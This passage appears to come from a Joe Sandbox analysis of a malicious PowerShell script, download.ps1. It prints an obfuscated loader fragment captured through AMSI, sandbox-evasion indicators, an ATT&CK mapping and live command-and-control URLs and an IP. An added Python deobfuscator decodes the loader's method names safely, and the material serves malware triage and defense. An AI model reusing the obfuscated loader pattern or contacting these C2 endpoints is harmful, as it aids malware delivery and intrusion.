c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIAB
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BF97000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engine | Classification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzo3vy2q.3cb.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ery1u6abt8kzvqf.(([char[]]@((3701-(9328478/(5404-2837))),(-8432+8543),(1027824/(58182180/(7937680/1252))),(-3743+(2279760/(411+179))),(385140/4585),(-8417+(4072+4456))) -join ''))( $vb6t0ze4my3ul8f ) $ery1u6abt8kzvqf.(([char[]]@((102309/1527),(5611-(813+(12021-7331))),(-5490+(39055773/(7426245/(6928-5863)))),(-4277+(-4724+(5756+3360))),(2487-(21543194/9029))) -join ''))()$4zudplrcemfx0w9.(([char[]]@((-4099+(23287940/5590)),(488484/4523),(1090242/9822),(78315/(7943-(17363-10101))),(2686-2585)) -join ''))()[byte[]] $0s2eox1rbc3i5vz = $vb6t0ze4my3ul8f.((-join (@((6550-(3933+(14040419/(9486-(14596986/3702))))),(10060-(15412-(3608+1855))),(-7853+7918),(-7871+7985),(9071-8957),(451341/(-3976+8629)),(3378-3257))| ForEach-Object { [char]$_ })))() $3mqe4b7hsju19rc=$0s2eox1rbc3i5vz return $3mqe4b7hsju19rc}[System.Text.Encoding]::ascii.((-join (@((6421-(27273250/4295)),(628119/6219),(106+10),(-2238+2321),(4547-(-2888+7319)),(-2222+(15709600/6725)),(232260/2212),(-5970+6080),(-7910+8013))| ForEach-Object { [char]$_ })))((5irawk2dpqsbxzn61j3of79v80c "… [buffer truncated in the report]. The five arithmetic char arrays in this buffer evaluate, in order, to CopyTo, Close, Close, ToArray and GetString: the script inflates an embedded blob through a decompression stream, copies it to a memory stream, turns it into a byte array and decodes it as ASCII, the usual shape of a staged loader.
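The AMSI buffer above hides every method name by spelling it as a list of integer arithmetic expressions, assembled either as `[char[]]@(...) -join ''` or as `-join (@(...) | ForEach-Object { [char]$_ })`, so that no identifier appears literally in the file. The decoder below is an added example written for this page; it is not code from the sample, from KongTuke or from the Joe Sandbox report, and the function names `safe_eval`, `decode_char_arrays` and `deobfuscate` are mine. It evaluates the expressions with a whitelist-only AST walker instead of eval() or Invoke-Expression, then rewrites the fragment of the buffer quoted in the report so the call chain reads plainly. The fragment is embedded as `SAMPLE` exactly as the report shows it, minus the truncated final argument.

```python
from __future__ import annotations

import ast
import re
from fractions import Fraction

# Fragment of the AMSI-captured buffer quoted in the report above. The final
# argument to 5irawk2dpqsbxzn61j3of79v80c is truncated in the report and is
# omitted here; nothing else is altered.
SAMPLE = """$ery1u6abt8kzvqf.(([char[]]@((3701-(9328478/(5404-2837))),(-8432+8543),(1027824/(58182180/(7937680/1252))),(-3743+(2279760/(411+179))),(385140/4585),(-8417+(4072+4456))) -join ''))( $vb6t0ze4my3ul8f ) $ery1u6abt8kzvqf.(([char[]]@((102309/1527),(5611-(813+(12021-7331))),(-5490+(39055773/(7426245/(6928-5863)))),(-4277+(-4724+(5756+3360))),(2487-(21543194/9029))) -join ''))()$4zudplrcemfx0w9.(([char[]]@((-4099+(23287940/5590)),(488484/4523),(1090242/9822),(78315/(7943-(17363-10101))),(2686-2585)) -join ''))()[byte[]] $0s2eox1rbc3i5vz = $vb6t0ze4my3ul8f.((-join (@((6550-(3933+(14040419/(9486-(14596986/3702))))),(10060-(15412-(3608+1855))),(-7853+7918),(-7871+7985),(9071-8957),(451341/(-3976+8629)),(3378-3257))| ForEach-Object { [char]$_ })))() $3mqe4b7hsju19rc=$0s2eox1rbc3i5vz return $3mqe4b7hsju19rc}[System.Text.Encoding]::ascii.((-join (@((6421-(27273250/4295)),(628119/6219),(106+10),(-2238+2321),(4547-(-2888+7319)),(-2222+(15709600/6725)),(232260/2212),(-5970+6080),(-7910+8013))| ForEach-Object { [char]$_ })))("""

# Two spellings of the same trick: [char[]]@(n1,n2,...) -join ''  and
# -join (@(n1,n2,...) | ForEach-Object { [char]$_ }); each n is an integer
# arithmetic expression that yields one code point.
_MARKER = re.compile(r"\[char\[\]\]@\(|-join \(@\(")

# Whitelisted operators: plain integer arithmetic, nothing callable.
_BINOPS = {
    ast.Add: lambda a, b: a + b,
    ast.Sub: lambda a, b: a - b,
    ast.Mult: lambda a, b: a * b,
    ast.Div: lambda a, b: a / b,  # exact rational division; every division in the sample is integral
}


def safe_eval(expr: str) -> Fraction:
    """Evaluate a parenthesised integer expression without eval(); anything else raises."""
    def walk(node: ast.AST) -> Fraction:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int) and not isinstance(node.value, bool):
            return Fraction(node.value)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            value = walk(node.operand)
            return -value if isinstance(node.op, ast.USub) else value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
            return _BINOPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported syntax in {expr!r}: {type(node).__name__}")
    return walk(ast.parse(expr.strip(), mode="eval"))


def _balanced(text: str, open_idx: int) -> tuple[str, int]:
    """Return (inner text, index of the matching ')') for the '(' at open_idx."""
    assert text[open_idx] == "("
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i], i
    raise ValueError("unbalanced parentheses")


def _split_top_level(items: str) -> list[str]:
    """Split on commas that are not nested inside parentheses."""
    parts, depth, cur = [], 0, []
    for ch in items:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return parts


def _chars_to_string(items: str) -> str:
    out = []
    for expr in _split_top_level(items):
        value = safe_eval(expr)
        if value.denominator != 1 or not 0 <= value <= 0x10FFFF:
            raise ValueError(f"{expr!r} does not evaluate to a code point")
        out.append(chr(int(value)))
    return "".join(out)


def decode_char_arrays(script: str) -> list[str]:
    """Every string the script builds from an arithmetic char array, in source order."""
    return [_chars_to_string(_balanced(script, m.end() - 1)[0]) for m in _MARKER.finditer(script)]


def deobfuscate(script: str) -> str:
    """Replace each arithmetic char array with a quoted literal so the call chain reads plainly."""
    out, pos = [], 0
    for m in _MARKER.finditer(script):
        items, close = _balanced(script, m.end() - 1)
        literal = "'" + _chars_to_string(items) + "'"
        if m.group() == "[char[]]@(":
            tail = " -join ''"
            end = close + 1 + (len(tail) if script.startswith(tail, close + 1) else 0)
        else:
            # consume the whole "-join (@(...) | ForEach-Object { [char]$_ })" group
            _, outer_close = _balanced(script, m.start() + len("-join "))
            end = outer_close + 1
        out.append(script[pos:m.start()])
        out.append(literal)
        pos = end
    out.append(script[pos:])
    return "".join(out)


if __name__ == "__main__":
    print(decode_char_arrays(SAMPLE))
    print(deobfuscate(SAMPLE))
```

Running the block prints `['CopyTo', 'Close', 'Close', 'ToArray', 'GetString']` and a rewritten fragment in which `$ery1u6abt8kzvqf.(('CopyTo'))( $vb6t0ze4my3ul8f )` and `[System.Text.Encoding]::ascii.(('GetString'))(` are visible; together with the `[IO.Compression.CompressionMode]::Decompress` at the start of the buffer this is the inflate-to-bytes, decode-to-string loader pattern. Evaluating through `ast` rather than handing the text to PowerShell matters because the same buffer may carry expressions that are not arithmetic at all; the walker refuses names, calls and attribute access, so a crafted sample cannot execute anything during triage.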
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in load order (repeats preserved as the report lists each load): atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, urlmon.dll, iertutil.dll, netutils.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, ondemandconnroutehelper.dll, fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb} source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbO source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1792982780.0000022F4278F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb364e35 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42C56000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B99D2A5 pushad ; iretd 0_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAB00BD pushad ; iretd 0_2_00007FFD9BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAB8E6C push es; iretd 0_2_00007FFD9BAB8F2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD255EA push edx; retf 0_2_00007FFD9BD255EB

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
Note: PowerShell's command auto-discovery reads module manifests under $PSModulePath whenever it resolves a command that is not yet loaded, so reads of BitLocker.psd1 on their own do not show that the script imports or calls the BitLocker module. No BitLocker assembly appears among the sections loaded above; look for Import-Module, BitLocker cmdlet names or a BitLocker DLL load before treating this as tampering with disk encryption.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (114 times)

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 times; 922337203685477 ms is TimeSpan.MaxValue, so this is an unbounded wait rather than a fixed-length sleep)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6368
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6860 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMwarexJ
Source: powershell.exe, 00000000.00000002.1795899984.0000022F42CF6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachineijbfdRMSFT_MpComputerStatus (IsVirtualMachine is a property of the Defender MSFT_MpComputerStatus CIM class)
Source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachinexJ
Source: powershell.exe, 00000000.00000002.1797144055.0000022F42D06000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware8
Note: "Hyper-V RAW" is the Winsock catalog name of the AF_HYPERV provider registered by mswsock.dll and is present on any Windows 10 host that has enumerated its protocol catalog, so those two strings are not VM evidence by themselves; the Win32_VideoController and Win32_CacheMemory queries and the VMware strings are the indicators that carry weight here.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the count of matching signatures, techniques without a number were not observed)

  • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
  • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
  • Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
  • Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
  • Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
  • Defense Evasion: Virtualization/Sandbox Evasion (121), Process Injection (1), Obfuscated Files or Information (1), DLL Side-Loading (1), Software Packing, Steganography
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
  • Discovery: Security Software Discovery (21), Process Discovery (1), Virtualization/Sandbox Evasion (121), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (11)
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
  • Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
  • Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
  • Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Source | Detection | Scanner | Label | Link
download.ps1 | 3% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527 | 0% | Avira URL Cloud | safe |
http://www.google.comv | 0% | Avira URL Cloud | safe |
http://kdemjgebjimkanl.top | 0% | Avira URL Cloud | safe |
http://kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kdemjgebjimkanl.top | 45.61.136.138 | true | true | | unknown
www.google.com | 142.250.185.132 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 | true | Avira URL Cloud: safe | unknown
http://www.google.com/ | false | | high
URLs found in process memory strings (Name / Source / Malicious / Antivirus Detection / Reputation): table omitted.
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.61.136.138 | kdemjgebjimkanl.top | United States | US | 40676 | AS40676 | true
142.250.185.132 | www.google.com | United States | US | 15169 | GOOGLE | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582507
Start date and time: 2024-12-30 19:14:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal68.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 18
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
